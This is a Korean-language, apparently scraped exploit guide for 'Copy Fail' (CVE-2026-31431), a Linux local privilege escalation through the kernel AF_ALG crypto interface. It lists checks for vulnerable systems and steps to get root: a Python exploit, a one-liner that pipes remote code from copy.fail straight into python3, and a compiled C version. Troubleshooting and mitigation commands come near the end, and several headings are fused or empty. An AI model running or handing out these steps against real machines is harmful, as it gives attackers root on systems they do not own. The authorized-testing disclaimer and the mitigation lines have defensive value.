
대부분의 Linux LPE는 레이스 윈도우(race window)나 커널별 오프셋이 필요합니다. Copy Fail은 직선형 로직 결함으로, 둘 다 필요하지 않습니다. 동일한 732바이트 Python 스크립트(또는 .c elf)는 2017년 이후 출시된 모든 Linux 배포판을 루트 권한으로 탈취합니다.
본 콘텐츠는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 명시적인 허가 없이 시스템에서 실행하지 마십시오.
**Copy Fail (CVE-2026-31431)**은 AF_ALG를 통해 커널 crypto API에 영향을 미치는 Linux 로컬 권한 상승(LPE) 취약점입니다.
이 취약점을 통해 권한이 없는 사용자가 SUID 바이너리(예: /usr/bin/su)의 페이지 캐시 데이터를 덮어쓰고 루트 액세스 권한을 얻을 수 있습니다.
AF_ALG 활성화algif_aead 모듈 로드os.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
예상 지표:
authencesn(hmac(sha256),cbc(aes))algif_aead 로드됨python3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
예상 결과:
uid=0(root)
os.splice not found원인:
해결 방법:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
가능한 원인:
필요한 도구 설치:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
시스템 업데이트:
apt update && apt upgrade
익스플로잇이 실패할 경우 다음을 고려하세요:
랩, CTF 및 승인된 펜테스트에서만 이 익스플로잇을 책임감 있게 사용하십시오.